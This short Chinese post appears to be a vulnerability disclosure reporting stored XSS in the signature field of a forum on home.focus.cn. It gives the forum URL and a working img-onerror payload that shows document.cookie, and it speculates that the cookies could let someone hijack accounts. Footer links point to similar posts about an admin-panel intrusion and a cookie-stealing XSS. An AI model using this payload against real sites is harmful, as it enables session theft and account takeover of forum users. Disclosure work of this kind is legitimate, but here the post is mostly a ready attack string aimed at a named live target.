随便找一个论坛链接   http://home.focus.cn/msgview/1632/270131257.html       在个人签名处输入：   <p>   <img height=”0″ onerror=”alert(/亲，这里有个xss 漏洞你们知道吗/);alert(document.cookie)” src=”#” width=”0″ />这个人很懒，留下个弹窗</p>   弹个小窗       cookie很多料，估计可盗号（没试，纯YY）

上一篇： TCCMS某处设计缺陷，成功打入官网后台 – 网站安全

下一篇： 腾讯视频主站分享至微信xss一枚，可cookie哦！